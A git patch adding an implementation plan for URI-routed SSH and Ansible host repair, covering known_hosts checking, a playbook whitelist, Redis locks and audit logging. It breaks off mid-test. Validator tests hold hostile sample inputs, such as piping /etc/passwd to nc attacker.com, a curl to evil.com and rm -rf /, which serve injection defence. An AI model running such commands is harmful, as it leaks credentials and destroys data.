From 1a8021bfaa1a9be2a0e0335c00ed415dcb1d6df2 Mon Sep 17 00:00:00 2001 From: OG T Date: Mon, 6 Apr 2026 14:08:28 +0800 Subject: [PATCH] =?UTF-8?q?docs(plans):=20Sprint=203=20SSH=5FCOMMAND=20?= =?UTF-8?q?=E6=8C=87=E6=8F=AE=E6=AC=8A=E9=8F=88=E5=AF=A6=E4=BD=9C=E8=A8=88?= =?UTF-8?q?=E7=95=AB=20(7=20tasks)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../2026-04-06-sprint3-ssh-command-chain.md | 1097 +++++++++++++++++ 1 file changed, 1097 insertions(+) create mode 100644 docs/superpowers/plans/2026-04-06-sprint3-ssh-command-chain.md diff --git a/docs/superpowers/plans/2026-04-06-sprint3-ssh-command-chain.md b/docs/superpowers/plans/2026-04-06-sprint3-ssh-command-chain.md new file mode 100644 index 00000000..1d9a8c48 --- /dev/null +++ b/docs/superpowers/plans/2026-04-06-sprint3-ssh-command-chain.md @@ -0,0 +1,1097 @@ +# Sprint 3 SSH_COMMAND 指揮權鏈 Implementation Plan + +> **For agentic workers:** REQUIRED SUB-SKILL: Use superpowers:subagent-driven-development (recommended) or superpowers:executing-plans to implement this plan task-by-task. Steps use checkbox (`- [ ]`) syntax for tracking. + +**Goal:** 讓 AWOOOI AutoRepair 透過 URI scheme 路由(`openclaw://`、`ansible://`、`ssh://`)執行主機層修復,並補齊安全(known_hosts、ConfigMap 白名單、Shell Injection 防護)、可觀測性(AuditLog、Langfuse Trace)、架構(Redis 冪等鎖、勝率反饋)八大遺漏點。 + +**Architecture:** `auto_repair_service.py` 呼叫 `HostRepairAgent.repair_by_uri(command)`,後者根據 URI scheme 分派至 `openclaw://`(現有 repair_lock 機制)、`ansible://`(SSH → .188 執行 ansible-playbook)、`ssh://`(直接命令,強制 approval)三條路徑。所有路徑共用 known_hosts 驗證、Redis 冪等鎖、PostgreSQL AuditLog、Langfuse Trace。 + +**Tech Stack:** Python 3.10+, asyncio, asyncpg/SQLAlchemy, Redis (aioredis via existing redis_client.py), Langfuse SDK (existing langfuse_client.py), K8s ConfigMap, SSH (OpenSSH subprocess) + +--- + +## 檔案結構 + +| 操作 | 路徑 | 職責 | +|---|---|---| +| **修改** | `apps/api/src/services/host_repair_agent.py` | 加入 URI scheme 解析、三條執行路徑、known_hosts、Shell Injection 防護 | +| **修改** | `apps/api/src/services/auto_repair_service.py:500-513` | 改呼叫 `repair_by_uri()` 取代舊的 `layer/component` 格式 | +| **修改** | `k8s/awoooi-prod/04-configmap.yaml` | 新增 `ANSIBLE_PLAYBOOK_WHITELIST` ConfigMap 條目 | +| **修改** | `k8s/awoooi-prod/06-deployment-api.yaml` | 新增 known_hosts Secret Volume Mount | +| **新增** | `k8s/awoooi-prod/04-repair-known-hosts-template.yaml` | known_hosts Secret template | +| **測試** | `apps/api/tests/test_host_repair_agent.py` | URI 解析、安全防護、執行路徑的單元測試 | +| **測試** | `apps/api/tests/test_auto_repair_service.py` | 新增 SSH_COMMAND 整合測試 | + +--- + +## Task 1: URI Scheme 解析器 + Shell Injection 防護 + +**Files:** +- Modify: `apps/api/src/services/host_repair_agent.py` +- Test: `apps/api/tests/test_host_repair_agent.py` + +這個 task 只加解析邏輯,不動執行邏輯。 + +- [ ] **Step 1: 新增測試檔 `tests/test_host_repair_agent.py`** + +```python +""" +tests/test_host_repair_agent.py +Host Repair Agent URI 解析與安全防護測試 +2026-04-06 Claude Code: Sprint 3 +""" +import pytest +from src.services.host_repair_agent import parse_uri_command, SshCommandURI, validate_shell_safety + + +class TestParseUriCommand: + def test_openclaw_scheme(self): + result = parse_uri_command("openclaw://docker-110/sentry") + assert result.scheme == "openclaw" + assert result.host_or_layer == "docker-110" + assert result.payload == "sentry" + + def test_ansible_scheme(self): + result = parse_uri_command("ansible://192.168.0.188/vacuum_postgres.yml") + assert result.scheme == "ansible" + assert result.host_or_layer == "192.168.0.188" + assert result.payload == "vacuum_postgres.yml" + + def test_ssh_scheme(self): + result = parse_uri_command("ssh://wooo@192.168.0.110/docker ps") + assert result.scheme == "ssh" + assert result.host_or_layer == "wooo@192.168.0.110" + assert result.payload == "docker ps" + + def test_invalid_scheme_raises(self): + with pytest.raises(ValueError, match="Unsupported scheme"): + parse_uri_command("http://example.com/cmd") + + def test_missing_payload_raises(self): + with pytest.raises(ValueError, match="payload"): + parse_uri_command("ansible://192.168.0.188/") + + def test_legacy_format_raises(self): + with pytest.raises(ValueError, match="Unsupported scheme"): + parse_uri_command("docker-110/sentry") + + +class TestValidateShellSafety: + def test_safe_command_passes(self): + validate_shell_safety("docker ps") # must not raise + + def test_semicolon_blocked(self): + with pytest.raises(ValueError, match="Shell metacharacter"): + validate_shell_safety("docker ps; rm -rf /") + + def test_pipe_blocked(self): + with pytest.raises(ValueError, match="Shell metacharacter"): + validate_shell_safety("cat /etc/passwd | nc attacker.com 9999") + + def test_double_ampersand_blocked(self): + with pytest.raises(ValueError, match="Shell metacharacter"): + validate_shell_safety("ls && curl http://evil.com") + + def test_command_substitution_blocked(self): + with pytest.raises(ValueError, match="Shell metacharacter"): + validate_shell_safety("echo $(id)") + + def test_backtick_blocked(self): + with pytest.raises(ValueError, match="Shell metacharacter"): + validate_shell_safety("echo `id`") + + def test_too_long_blocked(self): + with pytest.raises(ValueError, match="too long"): + validate_shell_safety("a" * 513) +``` + +- [ ] **Step 2: 確認測試現在失敗** + +```bash +cd /Users/ogt/awoooi +python -m pytest apps/api/tests/test_host_repair_agent.py -v 2>&1 | head -20 +``` + +期望: `ImportError: cannot import name 'parse_uri_command'` + +- [ ] **Step 3: 在 `host_repair_agent.py` 開頭加入 dataclass 和兩個函式** + +在檔案頂部 import 區塊後、`LAYER_SSH_CONFIG` 之前,加入: + +```python +from dataclasses import dataclass +import shlex + +# ============================================================================= +# URI Scheme 解析 +# ============================================================================= + +@dataclass +class SshCommandURI: + """解析後的 SSH_COMMAND URI""" + scheme: str # "openclaw" | "ansible" | "ssh" + host_or_layer: str # "docker-110" | "192.168.0.188" | "wooo@192.168.0.110" + payload: str # component name | playbook filename | raw command + + +_SUPPORTED_SCHEMES = {"openclaw", "ansible", "ssh"} +_SHELL_METACHAR_RE = re.compile(r'[;&|`$]|&&|\|\||\$\(') +_MAX_COMMAND_LEN = 512 + + +def parse_uri_command(command: str) -> SshCommandURI: + """ + 解析 SSH_COMMAND URI scheme。 + + 支援格式: + openclaw://docker-110/sentry + ansible://192.168.0.188/vacuum_postgres.yml + ssh://wooo@192.168.0.110/docker ps + + Raises: + ValueError: scheme 不支援或 payload 為空 + """ + if "://" not in command: + raise ValueError(f"Unsupported scheme: '{command}' (expected scheme://host/payload)") + scheme, rest = command.split("://", 1) + if scheme not in _SUPPORTED_SCHEMES: + raise ValueError(f"Unsupported scheme: '{scheme}' (supported: {_SUPPORTED_SCHEMES})") + if "/" not in rest: + raise ValueError(f"Invalid URI '{command}': missing payload after host") + host_or_layer, payload = rest.split("/", 1) + if not payload: + raise ValueError(f"Invalid URI '{command}': payload is empty") + return SshCommandURI(scheme=scheme, host_or_layer=host_or_layer, payload=payload) + + +def validate_shell_safety(command: str) -> None: + """ + 驗證 ssh:// payload 不含 shell metacharacter 或超長命令。 + + Raises: + ValueError: 含危險字元或超過長度限制 + """ + if len(command) > _MAX_COMMAND_LEN: + raise ValueError(f"Command too long: {len(command)} > {_MAX_COMMAND_LEN}") + if _SHELL_METACHAR_RE.search(command): + raise ValueError(f"Shell metacharacter detected in command: '{command}'") +``` + +- [ ] **Step 4: 確認測試通過** + +```bash +python -m pytest apps/api/tests/test_host_repair_agent.py::TestParseUriCommand \ + apps/api/tests/test_host_repair_agent.py::TestValidateShellSafety -v +``` + +期望: `10 passed` + +- [ ] **Step 5: Commit** + +```bash +git add apps/api/src/services/host_repair_agent.py apps/api/tests/test_host_repair_agent.py +git commit -m "feat(api): URI scheme 解析器 + Shell Injection 防護 (Sprint 3 T1)" +``` + +--- + +## Task 2: known_hosts Secret + ConfigMap Ansible 白名單 + +**Files:** +- Create: `k8s/awoooi-prod/04-repair-known-hosts-template.yaml` +- Modify: `k8s/awoooi-prod/04-configmap.yaml` +- Modify: `k8s/awoooi-prod/06-deployment-api.yaml` + +- [ ] **Step 1: 建立 known_hosts Secret template** + +建立 `k8s/awoooi-prod/04-repair-known-hosts-template.yaml`: + +```yaml +# k8s/awoooi-prod/04-repair-known-hosts-template.yaml +# known_hosts Secret Template — 不含實際主機指紋 (需手動建立) +# 2026-04-06 Claude Code: Sprint 3 Security Fix A1 +# +# 建立方式: +# # 掃描目標主機指紋 +# ssh-keyscan -H 192.168.0.110 > /tmp/known_hosts +# ssh-keyscan -H 192.168.0.188 >> /tmp/known_hosts +# +# kubectl create secret generic awoooi-repair-known-hosts \ +# -n awoooi-prod \ +# --from-file=known_hosts=/tmp/known_hosts +# +# 驗證: +# kubectl get secret awoooi-repair-known-hosts -n awoooi-prod +# → 應有 known_hosts key +# +# 安全說明: +# - known_hosts 存 K8s Secret,掛載至 /etc/repair-ssh/known_hosts +# - SSH 命令使用 -o UserKnownHostsFile=/etc/repair-ssh/known_hosts +# - 移除 -o StrictHostKeyChecking=no (安全漏洞) +apiVersion: v1 +kind: Secret +metadata: + name: awoooi-repair-known-hosts + namespace: awoooi-prod + annotations: + awoooi.io/secret-type: "ssh-known-hosts" + awoooi.io/created: "2026-04-06" +type: Opaque +# data: 不在版控中 — 使用上方 ssh-keyscan 指令建立 +``` + +- [ ] **Step 2: 在 `04-configmap.yaml` 新增 Ansible 白名單** + +在 `04-configmap.yaml` 的 `data:` 區塊末尾加入: + +```yaml + # 2026-04-06 Claude Code: Sprint 3 — ansible:// 白名單 (Security Fix A2) + # 逗號分隔,只允許此清單中的 playbook 名稱執行 + # 新增 playbook 時修改此值後重新 kubectl apply,無需重新部署 Pod + ANSIBLE_PLAYBOOK_WHITELIST: "restart_docker_service.yml,vacuum_postgres.yml,clear_redis_cache.yml" + # ansible:// 強制執行節點 (Security Fix C3: 單一控制節點) + ANSIBLE_CONTROL_NODE_HOST: "192.168.0.188" + ANSIBLE_CONTROL_NODE_USER: "ollama" + ANSIBLE_PLAYBOOKS_PATH: "~/openclaw-v5/ansible/playbooks" +``` + +- [ ] **Step 3: 在 `06-deployment-api.yaml` 加入 known_hosts Volume Mount** + +找到現有的 `repair-ssh-key` volume mount 區塊(約在第 55 行),在其後加入: + +```yaml + # 2026-04-06 Claude Code: Sprint 3 Security Fix A1 — known_hosts + - name: repair-known-hosts + mountPath: /etc/repair-ssh/known_hosts + subPath: known_hosts + readOnly: true +``` + +在 `volumes:` 區塊(約在第 102 行),在 `repair-ssh-key` volume 後加入: + +```yaml + # 2026-04-06 Claude Code: Sprint 3 Security Fix A1 + - name: repair-known-hosts + secret: + secretName: awoooi-repair-known-hosts +``` + +- [ ] **Step 4: 在 .188 上實際執行建立 Secrets** + +```bash +# 在 .120 K3s 節點上執行 +ssh wooo@192.168.0.120 " + ssh-keyscan -H 192.168.0.110 > /tmp/known_hosts_repair + ssh-keyscan -H 192.168.0.188 >> /tmp/known_hosts_repair + kubectl create secret generic awoooi-repair-known-hosts \ + -n awoooi-prod \ + --from-file=known_hosts=/tmp/known_hosts_repair \ + --dry-run=client -o yaml | kubectl apply -f - + kubectl get secret awoooi-repair-known-hosts -n awoooi-prod +" +``` + +期望: `secret/awoooi-repair-known-hosts configured` + +- [ ] **Step 5: Commit** + +```bash +git add k8s/awoooi-prod/04-repair-known-hosts-template.yaml \ + k8s/awoooi-prod/04-configmap.yaml \ + k8s/awoooi-prod/06-deployment-api.yaml +git commit -m "ops(k8s): known_hosts Secret + Ansible 白名單 ConfigMap (Sprint 3 T2)" +``` + +--- + +## Task 3: HostRepairAgent 三條執行路徑 + 安全防護整合 + +**Files:** +- Modify: `apps/api/src/services/host_repair_agent.py` +- Test: `apps/api/tests/test_host_repair_agent.py` + +- [ ] **Step 1: 新增 ansible 白名單相關測試** + +在 `tests/test_host_repair_agent.py` 新增: + +```python +import os +from unittest.mock import patch, AsyncMock + + +class TestAnsibleWhitelist: + def test_allowed_playbook_passes(self): + from src.services.host_repair_agent import validate_ansible_playbook + with patch.dict(os.environ, {"ANSIBLE_PLAYBOOK_WHITELIST": "vacuum_postgres.yml,clear_redis_cache.yml"}): + validate_ansible_playbook("vacuum_postgres.yml") # must not raise + + def test_disallowed_playbook_raises(self): + from src.services.host_repair_agent import validate_ansible_playbook + with patch.dict(os.environ, {"ANSIBLE_PLAYBOOK_WHITELIST": "vacuum_postgres.yml"}): + with pytest.raises(ValueError, match="not in allowed whitelist"): + validate_ansible_playbook("evil_script.sh") + + def test_path_traversal_blocked(self): + from src.services.host_repair_agent import validate_ansible_playbook + with patch.dict(os.environ, {"ANSIBLE_PLAYBOOK_WHITELIST": "../../../etc/passwd"}): + with pytest.raises(ValueError, match="not in allowed whitelist"): + validate_ansible_playbook("../../../etc/passwd") + + +class TestRepairByUri: + @pytest.mark.asyncio + async def test_openclaw_scheme_calls_repair(self): + from src.services.host_repair_agent import HostRepairAgent + agent = HostRepairAgent() + with patch.object(agent, "_execute_openclaw", new_callable=AsyncMock) as mock_oc: + mock_oc.return_value = HostRepairResult(success=True, layer="docker-110", component="sentry", output="REPAIR_OK:sentry") + result = await agent.repair_by_uri("openclaw://docker-110/sentry") + assert result.success is True + mock_oc.assert_awaited_once_with("docker-110", "sentry") + + @pytest.mark.asyncio + async def test_ansible_scheme_calls_ansible(self): + from src.services.host_repair_agent import HostRepairAgent + agent = HostRepairAgent() + with patch.object(agent, "_execute_ansible", new_callable=AsyncMock) as mock_ans: + mock_ans.return_value = HostRepairResult(success=True, layer="ansible", component="vacuum_postgres.yml", output="REPAIR_OK:ansible") + with patch.dict(os.environ, {"ANSIBLE_PLAYBOOK_WHITELIST": "vacuum_postgres.yml"}): + result = await agent.repair_by_uri("ansible://192.168.0.188/vacuum_postgres.yml") + assert result.success is True + mock_ans.assert_awaited_once_with("192.168.0.188", "vacuum_postgres.yml") + + @pytest.mark.asyncio + async def test_ssh_scheme_blocked_without_approval_flag(self): + from src.services.host_repair_agent import HostRepairAgent + agent = HostRepairAgent() + result = await agent.repair_by_uri("ssh://wooo@192.168.0.110/docker ps") + # ssh:// 在 auto_repair_service 層必須帶 requires_approval=True 才能執行 + # repair_by_uri 直接呼叫時應拒絕 (沒有 approved=True 參數) + assert result.success is False + assert "requires_approval" in result.error + + @pytest.mark.asyncio + async def test_invalid_uri_returns_failure(self): + from src.services.host_repair_agent import HostRepairAgent + agent = HostRepairAgent() + result = await agent.repair_by_uri("bad-format") + assert result.success is False + assert "Unsupported scheme" in result.error +``` + +- [ ] **Step 2: 確認新測試失敗** + +```bash +python -m pytest apps/api/tests/test_host_repair_agent.py::TestAnsibleWhitelist \ + apps/api/tests/test_host_repair_agent.py::TestRepairByUri -v 2>&1 | head -20 +``` + +期望: `ImportError: cannot import name 'validate_ansible_playbook'` + +- [ ] **Step 3: 在 `host_repair_agent.py` 加入 `validate_ansible_playbook` 和 `repair_by_uri`** + +在 `LAYER_SSH_CONFIG` 後、`HostRepairAgent` class 前加入: + +```python +# Ansible 控制節點設定 — 從 env/ConfigMap 讀取 +ANSIBLE_CONTROL_HOST = os.environ.get("ANSIBLE_CONTROL_NODE_HOST", "192.168.0.188") +ANSIBLE_CONTROL_USER = os.environ.get("ANSIBLE_CONTROL_NODE_USER", "ollama") +ANSIBLE_PLAYBOOKS_PATH = os.environ.get("ANSIBLE_PLAYBOOKS_PATH", "~/openclaw-v5/ansible/playbooks") +KNOWN_HOSTS_PATH = "/etc/repair-ssh/known_hosts" + + +def validate_ansible_playbook(playbook_name: str) -> None: + """ + 驗證 playbook 名稱在白名單內,防止路徑遍歷攻擊。 + 白名單從環境變數 ANSIBLE_PLAYBOOK_WHITELIST 讀取(ConfigMap 注入)。 + + Raises: + ValueError: playbook 不在白名單 + """ + whitelist_raw = os.environ.get("ANSIBLE_PLAYBOOK_WHITELIST", "") + allowed = {p.strip() for p in whitelist_raw.split(",") if p.strip()} + # 只比對檔名,不允許路徑分隔符 + if "/" in playbook_name or ".." in playbook_name or playbook_name not in allowed: + raise ValueError( + f"Security Block: '{playbook_name}' not in allowed whitelist. " + f"Allowed: {sorted(allowed)}" + ) +``` + +在 file 頂部 import 區塊加入 `import os`。 + +- [ ] **Step 4: 在 `HostRepairAgent` class 加入 `repair_by_uri` 和三條路徑方法** + +在 `HostRepairAgent` class 內,`repair` method 後加入: + +```python + async def repair_by_uri(self, command: str, approved: bool = False) -> HostRepairResult: + """ + 根據 URI scheme 路由至對應的執行路徑。 + + Args: + command: URI 格式命令,例如 "openclaw://docker-110/sentry" + approved: ssh:// scheme 需要明確設為 True 才能執行 + """ + try: + uri = parse_uri_command(command) + except ValueError as e: + return HostRepairResult(success=False, layer="", component="", error=str(e)) + + if uri.scheme == "openclaw": + return await self._execute_openclaw(uri.host_or_layer, uri.payload) + + if uri.scheme == "ansible": + try: + validate_ansible_playbook(uri.payload) + except ValueError as e: + return HostRepairResult(success=False, layer="ansible", component=uri.payload, error=str(e)) + return await self._execute_ansible(uri.host_or_layer, uri.payload) + + if uri.scheme == "ssh": + if not approved: + return HostRepairResult( + success=False, + layer="ssh", + component=uri.payload, + error="ssh:// scheme requires_approval=True — must be explicitly approved", + ) + try: + validate_shell_safety(uri.payload) + except ValueError as e: + return HostRepairResult(success=False, layer="ssh", component=uri.payload, error=str(e)) + return await self._execute_ssh_direct(uri.host_or_layer, uri.payload) + + return HostRepairResult(success=False, layer="", component="", error=f"Unhandled scheme: {uri.scheme}") + + async def _execute_openclaw(self, layer: str, component: str) -> HostRepairResult: + """openclaw:// — 呼叫現有的 repair(layer, component) 邏輯""" + return await self.repair(layer=layer, component=component) + + async def _execute_ansible(self, control_host: str, playbook_name: str) -> HostRepairResult: + """ + ansible:// — SSH 至 .188 控制節點,執行 ansible-playbook。 + + 執行路徑: AWOOOI API Pod → SSH → .188 (ansible-playbook) → .110/.188 (目標) + """ + # ansible:// 強制使用 ConfigMap 中的控制節點 (.188),忽略 URI 中的 host + # (安全設計:防止 URI 中指定任意 ansible 控制節點) + host = ANSIBLE_CONTROL_HOST + user = ANSIBLE_CONTROL_USER + playbook_path = f"{ANSIBLE_PLAYBOOKS_PATH}/{playbook_name}" + ssh_command = f"ansible-playbook {playbook_path}" + + try: + output = await self._ssh_execute( + host=host, + user=user, + key_path="/etc/repair-ssh/id_ed25519", + command=ssh_command, + ) + except asyncio.TimeoutError: + return HostRepairResult( + success=False, layer="ansible", component=playbook_name, + error=f"Ansible SSH timeout after {SSH_TIMEOUT}s", + ) + except Exception as e: + return HostRepairResult( + success=False, layer="ansible", component=playbook_name, + error=str(e), + ) + + success = "REPAIR_OK" in output or "ok=" in output + return HostRepairResult( + success=success, + layer="ansible", + component=playbook_name, + output=output, + error="" if success else output, + ) + + async def _execute_ssh_direct(self, host_user: str, command: str) -> HostRepairResult: + """ + ssh:// — 直接執行 SSH 命令(需明確 approved=True)。 + host_user 格式: "wooo@192.168.0.110" + """ + if "@" in host_user: + user, host = host_user.split("@", 1) + else: + return HostRepairResult( + success=False, layer="ssh", component=command, + error=f"Invalid host_user format '{host_user}' (expected user@host)", + ) + try: + output = await self._ssh_execute( + host=host, + user=user, + key_path="/etc/repair-ssh/id_ed25519", + command=command, + ) + except asyncio.TimeoutError: + return HostRepairResult( + success=False, layer="ssh", component=command, + error=f"SSH timeout after {SSH_TIMEOUT}s", + ) + except Exception as e: + return HostRepairResult(success=False, layer="ssh", component=command, error=str(e)) + + success = not output.startswith("ERROR") + return HostRepairResult( + success=success, + layer="ssh", + component=command, + output=output, + error="" if success else output, + ) +``` + +- [ ] **Step 5: 修正 `_ssh_execute` — 移除 StrictHostKeyChecking=no,改用 known_hosts** + +將現有的 `_ssh_execute` 方法中的 SSH 呼叫從: + +```python + "ssh", + "-i", key_path, + "-o", "StrictHostKeyChecking=no", + "-o", "BatchMode=yes", + "-o", f"ConnectTimeout={SSH_TIMEOUT}", +``` + +改為: + +```python + "ssh", + "-i", key_path, + "-o", "StrictHostKeyChecking=yes", + "-o", f"UserKnownHostsFile={KNOWN_HOSTS_PATH}", + "-o", "BatchMode=yes", + "-o", f"ConnectTimeout={SSH_TIMEOUT}", +``` + +- [ ] **Step 6: 確認所有測試通過** + +```bash +python -m pytest apps/api/tests/test_host_repair_agent.py -v +``` + +期望: 全部 `PASSED`(約 14 個測試) + +- [ ] **Step 7: Commit** + +```bash +git add apps/api/src/services/host_repair_agent.py apps/api/tests/test_host_repair_agent.py +git commit -m "feat(api): HostRepairAgent 三條執行路徑 + known_hosts + Ansible 白名單 (Sprint 3 T3)" +``` + +--- + +## Task 4: Redis 冪等鎖(防重複執行) + +**Files:** +- Modify: `apps/api/src/services/host_repair_agent.py` +- Test: `apps/api/tests/test_host_repair_agent.py` + +Redis `RedisLock` class 已在 `src/core/redis_client.py:173` 實作,直接使用。 + +- [ ] **Step 1: 新增冪等鎖測試** + +在 `tests/test_host_repair_agent.py` 加入: + +```python +class TestRepairLock: + @pytest.mark.asyncio + async def test_duplicate_repair_is_blocked(self): + """同一個 component 的修復,第二次呼叫應被 lock 阻擋""" + from src.services.host_repair_agent import HostRepairAgent + from unittest.mock import AsyncMock, patch + agent = HostRepairAgent() + + call_count = 0 + + async def fake_execute_openclaw(layer, component): + nonlocal call_count + call_count += 1 + await asyncio.sleep(0.1) # simulate work + return HostRepairResult(success=True, layer=layer, component=component, output="REPAIR_OK:test") + + with patch.object(agent, "_execute_openclaw", side_effect=fake_execute_openclaw): + # 同時發出兩個相同的修復請求 + results = await asyncio.gather( + agent.repair_by_uri("openclaw://docker-110/sentry"), + agent.repair_by_uri("openclaw://docker-110/sentry"), + return_exceptions=True, + ) + + # 其中一個應成功,另一個應被 lock 阻擋(返回 success=False + "already running") + successes = [r for r in results if isinstance(r, HostRepairResult) and r.success] + blocked = [r for r in results if isinstance(r, HostRepairResult) and not r.success and "already running" in r.error] + assert len(successes) == 1 + assert len(blocked) == 1 +``` + +- [ ] **Step 2: 確認測試失敗** + +```bash +python -m pytest apps/api/tests/test_host_repair_agent.py::TestRepairLock -v 2>&1 | tail -10 +``` + +期望: `FAILED` — 因為目前 `repair_by_uri` 沒有 lock,兩次都會成功。 + +- [ ] **Step 3: 在 `repair_by_uri` 加入 Redis 冪等鎖** + +在 `host_repair_agent.py` import 區加入: + +```python +from src.core.redis_client import RedisLock, get_redis +``` + +在 `repair_by_uri` 開頭(parse_uri_command 之後、scheme 判斷之前)加入 lock: + +```python + # Redis 冪等鎖:防止同一 component 同時被修復兩次 + lock_key = f"repair_lock:ssh_command:{uri.scheme}:{uri.host_or_layer}:{uri.payload}" + try: + async with RedisLock(lock_key, timeout=SSH_TIMEOUT + 30): + # --- 實際執行邏輯 (移到此 block 內) --- + if uri.scheme == "openclaw": + ... +``` + +> **注意**: 要把整個 scheme 判斷區塊都移到 `async with RedisLock` 內。只有 `parse_uri_command` 和 lock 建立在外面。 + +如果 RedisLock 無法取得(timeout),在 `except` 中返回: + +```python + except Exception as lock_err: + if "timeout" in str(lock_err).lower() or "lock" in str(lock_err).lower(): + return HostRepairResult( + success=False, layer=uri.scheme, component=uri.payload, + error=f"Repair already running for {uri.scheme}://{uri.host_or_layer}/{uri.payload}", + ) + raise +``` + +- [ ] **Step 4: 確認測試通過** + +```bash +python -m pytest apps/api/tests/test_host_repair_agent.py -v +``` + +期望: 全部 `PASSED` + +- [ ] **Step 5: Commit** + +```bash +git add apps/api/src/services/host_repair_agent.py apps/api/tests/test_host_repair_agent.py +git commit -m "feat(api): Redis 冪等鎖防止重複修復 (Sprint 3 T4)" +``` + +--- + +## Task 5: AuditLog + Langfuse Trace + +**Files:** +- Modify: `apps/api/src/services/host_repair_agent.py` +- Test: `apps/api/tests/test_host_repair_agent.py` + +AuditLog 寫入模式參考 `src/services/executor.py:830`,Langfuse 使用 `src/services/langfuse_client.py` 的 `langfuse_trace` context manager。 + +- [ ] **Step 1: 新增 AuditLog 寫入測試** + +在 `tests/test_host_repair_agent.py` 加入: + +```python +class TestAuditLog: + @pytest.mark.asyncio + async def test_successful_repair_writes_audit_log(self): + """成功修復應寫入 AuditLog 到 DB""" + from src.services.host_repair_agent import HostRepairAgent + from unittest.mock import patch, AsyncMock, MagicMock + + agent = HostRepairAgent() + mock_db_add = MagicMock() + + with patch.object(agent, "_execute_openclaw", new_callable=AsyncMock) as mock_oc, \ + patch("src.services.host_repair_agent.get_db_context") as mock_db_ctx, \ + patch("src.services.host_repair_agent.RedisLock") as mock_lock: + + mock_oc.return_value = HostRepairResult( + success=True, layer="docker-110", component="sentry", output="REPAIR_OK:sentry" + ) + # Mock DB context manager + mock_session = AsyncMock() + mock_session.add = mock_db_add + mock_session.commit = AsyncMock() + mock_db_ctx.return_value.__aenter__ = AsyncMock(return_value=mock_session) + mock_db_ctx.return_value.__aexit__ = AsyncMock(return_value=False) + # Mock Redis lock (always acquired) + mock_lock.return_value.__aenter__ = AsyncMock() + mock_lock.return_value.__aexit__ = AsyncMock(return_value=False) + + result = await agent.repair_by_uri("openclaw://docker-110/sentry") + + assert result.success is True + assert mock_db_add.called, "AuditLog should be written to DB" + # Verify the AuditLog has correct fields + audit_obj = mock_db_add.call_args[0][0] + assert audit_obj.operation_type == "SSH_COMMAND" + assert audit_obj.success is True +``` + +- [ ] **Step 2: 確認測試失敗** + +```bash +python -m pytest apps/api/tests/test_host_repair_agent.py::TestAuditLog -v 2>&1 | tail -10 +``` + +期望: `FAILED` — AuditLog 尚未實作 + +- [ ] **Step 3: 在 `host_repair_agent.py` 加入 DB import 和 `_write_audit_log` 方法** + +加入 import: + +```python +from src.db.base import get_db_context +from src.db.models import AuditLog +``` + +在 `HostRepairAgent` class 加入方法(放在 `_ssh_execute` 後): + +```python + async def _write_audit_log( + self, + uri: str, + success: bool, + output: str, + error: str | None, + duration_ms: int, + ) -> None: + """寫入 SSH_COMMAND 稽核日誌到 PostgreSQL。""" + try: + async with get_db_context() as db: + audit = AuditLog( + approval_id=None, # SSH_COMMAND 不走 Approval flow + operation_type="SSH_COMMAND", + target_resource=uri, + namespace="host-layer", + success=success, + error_message=error, + k8s_response={"output": output[:1000]} if output else None, + executed_by="auto_repair", + execution_duration_ms=duration_ms, + dry_run_passed=True, + dry_run_message=None, + ) + db.add(audit) + await db.commit() + logger.info("ssh_command_audit_written", uri=uri, success=success) + except Exception as e: + logger.error("ssh_command_audit_failed", uri=uri, error=str(e)) + # 不拋出 — audit 失敗不影響修復結果 +``` + +- [ ] **Step 4: 在 `repair_by_uri` 的 `async with RedisLock` 區塊末尾加入 AuditLog 和 Langfuse** + +在 lock 區塊中,scheme 執行完後(`return` 之前),改為先記錄再返回: + +```python + import time as _time + _start = _time.monotonic() + + # --- 執行 --- + if uri.scheme == "openclaw": + result = await self._execute_openclaw(uri.host_or_layer, uri.payload) + elif uri.scheme == "ansible": + ... # 同上 + result = await self._execute_ansible(...) + elif uri.scheme == "ssh": + ... + result = await self._execute_ssh_direct(...) + else: + result = HostRepairResult(success=False, layer="", component="", error=f"Unhandled scheme: {uri.scheme}") + + duration_ms = int((_time.monotonic() - _start) * 1000) + + # AuditLog (fire-and-forget, 失敗不影響 result) + await self._write_audit_log( + uri=command, + success=result.success, + output=result.output, + error=result.error or None, + duration_ms=duration_ms, + ) + + # Langfuse Trace (只在 enabled 時) + try: + from src.services.langfuse_client import get_langfuse + lf = get_langfuse() + if lf: + trace = lf.trace(name="ssh_command_repair") + trace.span( + name=f"{uri.scheme}_execute", + input={"uri": command}, + output={"success": result.success, "output": result.output[:500]}, + metadata={"duration_ms": duration_ms, "scheme": uri.scheme}, + ) + lf.flush() + except Exception as lf_err: + logger.debug("langfuse_trace_skipped", error=str(lf_err)) + + return result +``` + +- [ ] **Step 5: 確認所有測試通過** + +```bash +python -m pytest apps/api/tests/test_host_repair_agent.py -v +``` + +期望: 全部 `PASSED` + +- [ ] **Step 6: Commit** + +```bash +git add apps/api/src/services/host_repair_agent.py apps/api/tests/test_host_repair_agent.py +git commit -m "feat(api): AuditLog + Langfuse Trace for SSH_COMMAND (Sprint 3 T5)" +``` + +--- + +## Task 6: auto_repair_service 整合 repair_by_uri + 勝率反饋 + +**Files:** +- Modify: `apps/api/src/services/auto_repair_service.py:500-513` +- Test: `apps/api/tests/test_auto_repair_service.py` + +- [ ] **Step 1: 新增 SSH_COMMAND 整合測試** + +在 `tests/test_auto_repair_service.py` 加入: + +```python +class TestSshCommandIntegration: + """SSH_COMMAND action type 整合測試""" + + def _make_ssh_step(self, command: str, requires_approval: bool = False) -> RepairStep: + return RepairStep( + step=1, + action_type=ActionType.SSH_COMMAND, + command=command, + description="Test SSH repair", + risk_level=RiskLevel.LOW, + requires_approval=requires_approval, + timeout_seconds=60, + ) + + @pytest.mark.asyncio + async def test_openclaw_uri_executes_via_host_repair_agent(self): + from src.services.auto_repair_service import AutoRepairService + from unittest.mock import patch, AsyncMock + from src.services.host_repair_agent import HostRepairAgent, HostRepairResult + + service = AutoRepairService.__new__(AutoRepairService) + incident = create_test_incident() + step = self._make_ssh_step("openclaw://docker-110/sentry") + + with patch.object(HostRepairAgent, "repair_by_uri", new_callable=AsyncMock) as mock_repair: + mock_repair.return_value = HostRepairResult( + success=True, layer="docker-110", component="sentry", output="REPAIR_OK:sentry" + ) + result = await service._execute_step(incident, step) + + assert result == "SUCCESS: REPAIR_OK:sentry" + mock_repair.assert_awaited_once_with("openclaw://docker-110/sentry", approved=False) + + @pytest.mark.asyncio + async def test_failed_repair_returns_failed_string(self): + from src.services.auto_repair_service import AutoRepairService + from unittest.mock import patch, AsyncMock + from 